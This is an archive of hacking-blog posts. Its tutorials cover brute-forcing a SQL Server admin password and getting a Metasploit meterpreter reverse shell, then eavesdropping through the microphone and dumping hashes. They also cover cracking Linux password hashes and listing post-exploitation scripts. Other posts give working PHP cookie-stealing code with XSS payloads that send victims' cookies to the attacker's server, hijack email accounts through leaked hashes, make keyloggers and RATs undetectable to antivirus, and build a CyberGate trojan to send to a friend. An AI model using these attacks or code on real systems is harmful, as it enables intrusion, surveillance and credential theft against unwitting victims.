Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Saturday, 18 January 2014

How to Hack Databases: Cracking SQL Server Passwords & Owning the Server

How to Hack Databases: Cracking SQL Server Passwords 
& Owning the Server

In this tutorial, we'll look at how we can crack the password 
on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit. Once we have the 
metasploit command prompt, we need to define which 
module we want to use. 
In past Metasploit tutorials, we've always used exploits, 
but this one is a bit different. Instead, we will use a  
scanner  among the auxiliary modules that enables us
 to brute force 
the sa password. Let's load up mssql_login:

  • use scanner/mssql/mssql_login


As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary 

module. Now let's take a look at the options with this module.

  • show options

Step 2: Set Your Options

In order to run this MS SQL login module, we will need:
  1. A password file,
  2. Set the RHOSTS, and
  3. Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 c
ommonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, 
our target is at, and we will set our THREADS to 20.


Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password
 for the sa account.
  • exploit
As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient),
 it found the password on our sa account of "NullByte". Success! Now we have full sysadmin 
privileges on the database that we can hopefully convert to full system sysadmin privileges.


Step 4: Grab the xp__cmdshell

Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that
 to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell t
hat enables the sa account to gain a system command shell with full system admin rights. If we can i
nvoke that command shell, we may be able to load the payload of our choice on the system and 
own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this.
 Let's load it.
  • use windows/mssql/mssql_payload

Now, let's check the options for this exploit:
  • show options
In this case, we will try to load the meterpreter on this system, so let's:
  • set PAYLOAD windows/meterpreter/reverse_tcp
In addition, we need to set the LPORT, the LHOST, the RHOST and the password we
 recovered from the sa account from above, in this case, "NullByte".
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
Success! We have a meterpreter session!



Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, 
we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's
 try a few.

First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone
 else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.

  • meterpreter > run sound_recorder -i 100 -l /etc
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc 
directory. Of course, we can record as much audio as we want. We are only limited by hard drive 


Step 6: Grab the Hash

Now, let's grab some passwords so that we can log back back in whenever we please. Remember,
 once we have the admin password, we can login any time with Metasploit's psexec exploit.
  • meterpreter > hashdump

As you can see, we were able to grab the password hashes from the system

We then need to either crack the hashes using John the Ripper,


How to Crack User Passwords in a Linux System

How to Crack User Passwords in a Linux System

In this article, we'll look at how to grab the password hashes from a Linux system and 
crack the hashes using probably the most widely used password cracking tool out there,  
John the Ripper.

Let's boot up BackTrack and get hacking!

Where Linux Passwords Are Stored

Linux passwords are stored in the /etc/passwd file in cleartext in older systems and in 
/etc/shadow file in hash form on newer systems. We should expect that the passwords on
 anything other than old legacy systems to be stored in /etc/shadow.

Step 1: Create Some User Accounts

Since our BackTrack system probably doesn't have many users on it other than our root
 account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".
I've purposely chosen dictionary words as the complexity of the password is inversely related
 to the time necessary to crack it. One of the nice features of John the Ripper is that it will try to
 use a dictionary attack first. If that fails, it will try a hybrid attack. And only if that fails will it 
attempt a brute-force attack, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we now need
 to open John the Ripper. John the Ripper is a simple, but powerful password cracker without a 
GUI (this helps to make it faster as GUIs consume resources).

We can access it from BackTrack by going to the BackTrack button on the bottom left, then 
Backtrack, Privilege Escalation, Password Attacks, Offline Attacks, and finally select   
John the Ripper from the multiple password cracking tools available.
If you selected the correct menu item, it will open a terminal that looks like this.

By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:
  • bt > john -test
This command will send John the Ripper through a variety of benchmark tests to estimate how 
long it will take to break the passwords on your system. Your terminal will look something like this.
Now that John has estimated how long each of the encryption schemes will take to crack, let's
 put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our 
current directory along with the /etc/passwd file, then "unshadow" them and store them in
 file we'll call passwords. So, let's type both:
  • bt > cp /etc/shadow ./
  • bt > cp /etc/passwd ./
In Linux, the cp command means copy and the ./ represents our current directory. So this 
command says, copy the contents of /etc/shadow to my current directory. We do the same for
 the /etc/ passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that 
John can do its magic.
  • bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.
  • bt > john passwords

John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked

 all three of ours in a matter of seconds! Of course, more complex passwords will take significantly
 more time, but all we need is just one user with a simple password and we have access to the
 account in seconds.

It's also important to note that any password cracker is only as good as its word list. For more c

omplex or hybrid passwords, you probably want to use a password list containing far more
 passwords, including hybrid passwords such "p@$$w0rd" that combine special characters into

We'll be doing more password cracking among numerous other hacks, so keep coming back!
And if you have any questions, feel free to comment below

The Ultimate List of Hacking Scripts for Metasploit's Meterpreter

Please note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you find errors or typos, please feel free to post them here, so I will try correct them as soon as humanly possible.

Script Commands with Brief Descriptions

  • arp_scanner.rb - Script for performing an ARP's Scan Discovery.
  • autoroute.rb - Meterpreter session without having to background the current session.
  • checkvm.rb - Script for detecting if target host is a virtual machine.
  • credcollect.rb - Script to harvest credentials found on the host and store them in the database.
  • domain_list_gen.rb - Script for extracting domain admin account list for use.
  • dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
  • duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
  • enum_chrome.rb - Script to extract data from a chrome installation.
  • enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
  • enum_putty.rb - Enumerates Putty connections.
  • enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
  • enum_vmware.rb - Enumerates VMware configurations for VMware products.
  • event_manager.rb - Show information about Event Logs on the target system and their configuration.
  • file_collector.rb - Script for searching and downloading files that match a specific pattern.
  • get_application_list.rb - Script for extracting a list of installed applications and their version.
  • getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
  • get_env.rb - Script for extracting a list of all System and User environment variables.
  • getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
  • getgui.rb - Script to enable Windows RDP.
  • get_local_subnets.rb - Get a list of local subnets based on the host's routes.
  • get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
  • gettelnet.rb - Checks to see whether telnet is installed.
  • get_valid_community.rb - Gets a valid community string from SNMP.
  • getvncpw.rb - Gets the VNC password.
  • hashdump.rb - Grabs password hashes from the SAM.
  • hostedit.rb - Script for adding entries in to the Windows Hosts file.
  • keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
  • killav.rb - Terminates nearly every antivirus software on victim.
  • metsvc.rb - Delete one meterpreter service and start another.
  • migrate - Moves the meterpreter service to another process.
  • multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
  • multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
  • multi_meter_inject.rb - Script for injecting a reverce tcp Meterpreter Payload into memory of multiple PIDs, if none is provided a notepad process will be created and a Meterpreter Payload will be injected in to each.
  • multiscript.rb - Script for running multiple scripts on a Meterpreter session.
  • netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
  • packetrecorder.rb - Script for capturing packets in to a PCAP file.
  • panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
  • persistence.rb - Script for creating a persistent backdoor on a target host.
  • pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
  • powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
  • prefetchtool.rb - Script for extracting information from windows prefetch folder.
  • process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
  • remotewinenum.rb - This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool.
  • scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
  • schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
  • schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
  • scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
  • screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
  • screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
  • screen_dwld.rb - Script that recursively search and download files matching a given pattern.
  • service_manager.rb - Script for managing Windows services.
  • service_permissions_escalate.rb This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
  • sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
  • srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
  • uploadexec.rb - Script to upload executable file to host.
  • virtualbox_sysenter_dos - Script to DoS Virtual Box.
  • virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
  • vnc.rb - Meterpreter script for obtaining a quick VNC session.
  • webcam.rb - Script to enable and capture images from the host webcam.
  • win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
  • win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
  • winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
  • winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
  • wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.

Monday, 16 September 2013

Session hijacking or cookie stealing using php and javascript

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is 
sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back 
by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,
possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.
The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:<?php
function GetIP(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))$ip = getenv("HTTP_X_FORWARDED_FOR");else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))$ip = getenv("REMOTE_ADDR");else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))$ip = $_SERVER['REMOTE_ADDR'];else$ip = "unknown";return($ip);}
function logData(){$ipLog="log.txt";$cookie = $_SERVER['QUERY_STRING'];$register_globals = (bool) ini_get('register_gobals');if ($register_globals) $ip = getenv('REMOTE_ADDR');else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];$user_agent = $_SERVER['HTTP_USER_AGENT'];$rqst_method = $_SERVER['METHOD'];$rem_host = $_SERVER['REMOTE_HOST'];$referer = $_SERVER['HTTP_REFERER'];$date=date ("l dS of F Y h:i:s A");$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie");elsefputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");fclose($log);}

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies 
will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done
 by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites 
dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

<script language="Java script">document.location="; + document.cookie;</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

<a href="java script:document.location='                              cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

<a href="java script:document.location=''+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site
open cookie editor
Replace the cookie with the stolen cookie of the victim and 
refresh the page.Thats it!!! you should now be in his account.

 Download cookie editor mozilla plugin from here :

Don't forget to comment if you like my post. 

Tuesday, 20 August 2013

Fern wifi Cracker- A Wireless Penetration Testing Tool

Fern wifi Cracker- A Wireless Penetration Testing Tool 

 WiFi is now become the way for short distance Internet, for long distance we have WiMAX standard but WiFi is very important because you can find WiFi hot-spot everywhere like at the airport, coffee shop and at the educational places. There are so many people out there who are using WiFi at there home and at offices. Cracking a WiFi connection is a essential part of wardriving but for penetration tester and a ethical hacker WiFi or wireless network security is an important part. 

If you are doing a job as a IT security engineer and your task is to do a pen test on the wifi network. What tools are you going to use?

Operating system for this case is usually Linux or specially Ubuntu or backtrack, backtrack 5 contain different tools for WiFi cracking like aircrack-ng but in this article I will discuss something about Fern WiFi Cracker.

What Is Fern WiFi Cracker ?

Fern wifi cracker is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It can be run on any linux distribution like Fern wifi cracker is use in ubuntu or even you can use fern wifi cracker in windows but you must have some dependencies to run fern wifi cracker on windows.
Requirements of Fern wifi Cracker:
  • python
  • python-qt4
  • macchanger
  • aircrack-ng
  • xterm
  • subversion

Download Fern Wifi Cracker

 Fern wifi cracker can easily be install on ubuntu and backtrack, backbox,gnackbox and other distribution.

Fern wifi Cracker Tutorial

After downloading the file locate the directory and type. 

root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb

Click the refresh button to display monitor interfaces:

Please Note, the scan button is a dual button, meaning, by clicking it the first time it scans for networks,then by clicking the button again, it stops any scan that was initialized (vise versa).

Fern wifi is a GUI and it can crack WEP and WPA as well.

please leave comments and like my facebook page if u like this tutorial it took lots of time to write this article

Monday, 19 August 2013

Hacking any Gmail,Yahoo,Hotmail emails using Google

Hacking an Gmail,Yahoo,Hotmail emails using Google

To get success remeber this rule of hash technique TRY,Try and try :D

            today i will show u how to hack any gmail yahoo etc accounts very easily.
          I have seen the those people who want to hack someones email accounts spend their lots of time on searching but found nothing.Most of noob hackers try to hack someone with phishing attack.But today i am going to show you a very new method which is called hash technique.
So lets just begin 

1. open
2. now paste this code in the search bar and hit enter

  ext:sql intext:e10adc3949ba59abbe56e057f20f883e 

3. Now click on any of the displayed pages

   4, After clicking you will se these hashes along with the emails

5. copy any hash code Eg( 127359f404a2b735de9ba1336c66f480) and go to paste the hash code and click descrypt hash  After 2-3 seconds it will
give u the password if found.
Some emails wont work they hve changed their passwords or the hash code result is null
I hope that u will enjoy this tutorial thanks and like us on facebook

If the above site dont work try these sites

       This is illegal and only for educational purpose

100% FUD Crypters for Keyloggers and RATs

100% FUD Crypters for Keyloggers and RATs

So now i will teach u guys how to make ur keyloggers and rats 
Undetectable by antivirus so lets just begin 

What are Crypters and what is FUD???

Well, I won't extend this topic over here, as I have explained all things about crypters in my article FUD crypter basics. Once, you have gone through that article, move on to further steps.

How to use FUD crypter???
i have tried this Fud crypter and found it working perfectly and i hope 
it will work well for u aswell 

1. Download FUD Crypter software to bypass antivirus.
2. Run crypter on your computer to see:

3. Hit on Browse and select the Decay logger server you have created. Again, hit on second Browse button and select the msc2.exe stub file from downloaded folder. Select type of encryption like Xor, Rsa, etc. as you want. Now, hit on Crypt and select the path where you want to save the crypted FUD server.

4. You will find the crypted FUD server created at required destination. Now, bind this crypted keylogger server with any .exe file 
using Iexpress Binder software and send it to your victim to get the required email passwords from victim computer. You don't have to worry about victim antivirus as the crypted server will not be detected by any antivirus. I have posted the scan results below:

Scan result before crypting:

Scan result after Crypting:

Note: Since this crypter is public, it will remain FUD for not more than 2-3 days. So, use this crypter the earliest. The best way is to get the best hacking software - 
Winspy Keylogger, which is FUD (Fully UnDetectable). This is personally recommended keylogger from HackersAuthority 

So friends, try out this FUD crypter to bypass antivirus detection.This crypter supports many keyloggers and RATs. You can try out for your own server.

Enjoy FUD crypter to bypass antivirus detection... "D

And if u are wondering how to make your server click here 
To learn how to make your server with cybergate

Sunday, 18 August 2013

How to hack any computer with cybergate ultimate tutorial


Hello guys today i will show u how to hack  someonez pc with cybergate so lets just begin


1. Download cybergate mediafire link 
2.Install it
3. after installation put this password: cybergate

4. 4)Once you have put the password, Click on Login.
You will get the message
CyberGate Station is now unlocked and fully functional.
5)After that Click on control Center ==>Start

6. it will ask for the port no type any port number from 0 to 65535 But remember don't assign well known Ports like 80,21 etc..
6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server 

7. Now click add

8.Now you need to add your ip address  and the Port number you have add before.
To get You IP address go to Run==>cmd==>>ipconfig Like This

one you get the ip and port number go to installation tab 

 Here you will get Different Option.
=>Installation Directory :
Now Select any one option. where you want to infect your trojan in your Friends computer .
Select Registry option also .
Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:
Mostly Select the Default Browser.

9)Now go to Message Tab:

10)Now go to Keylogger Tab:

11)Now Directly Create Server:

Click on Create Server and Save you File ..

After that just give this file to your Friend and when he click on that File you will get the access of his system.
You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System.Hope U Like it


Note: You will maintain the Access till you have the same IP assign to your Computer.. 
 If U Face Any Problem Just Comment Below 

Comment and subsribe